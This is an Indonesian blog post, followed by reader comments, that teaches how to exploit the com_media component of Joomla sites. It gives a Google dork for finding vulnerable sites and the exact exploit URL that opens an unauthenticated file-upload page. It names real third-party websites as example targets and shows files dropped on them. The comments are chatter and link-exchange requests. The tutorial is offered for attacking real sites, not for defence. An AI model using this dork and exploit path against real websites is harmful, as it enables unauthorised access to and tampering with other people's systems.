Teknik Exploit Com_Media pada CMS Joomla – Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.
Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :
4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.
Refrensi : http://komandanseo.blogspot.com/
Exploit com_media itu apa ya?
???
Visit back 😀
And izin copassss =)
http://www.bloggerjava.net/
rada nggak mudeng sob sama joomla 😀 hhehehe tapi pelan2 aja deh blajarnya 🙂
Sip.
kalo bisa lebih rinci lagi nih tentang teknik ini buat apa?
Ini post nya di label apa ? :p
terimakasih sudah berbagi nih mas . rupanya bugs nya cukup mudah untuk d tembuss ..
Benar sob.
nyimak aja deh gk bs komen apa2 soalx gk ngerti *smile
Oke.
meneruskan warisan nih kang dari sultan haikal 🙂 sipp
Thanks bro.
mengapa php dan html gk bisa d'upload..??
Gak tau. :3
kunjungan sore, nyimak saja dech sobat… nggak paham, hahahaha
Wah joomla, kayanya nyimak dulu sob, happy blogging
mantep gan (y)
saya belajar joomla jadi pening sendiri.
Gan Tukeran Link Yuk..
Dah Ane Pasang Link Madura Di Blog Ane Cek Yo..
http://mrr-cyber.blogspot.com/p/link-exchange_1033.html
Ntar malem ya bro. Skrg ol hp. :3
Oke Gan..
kunjungan pagi sob 🙂
paling suka ane kalo post gini hehehe 😀
oh iya lama juga ngga BW dimari, apa kabar gan? 🙂
Baik bro. 😀
wah saya nyimak saja dech sob.. saya masih awam banget sama yang beginian hehehehe
Blog Cacad
asu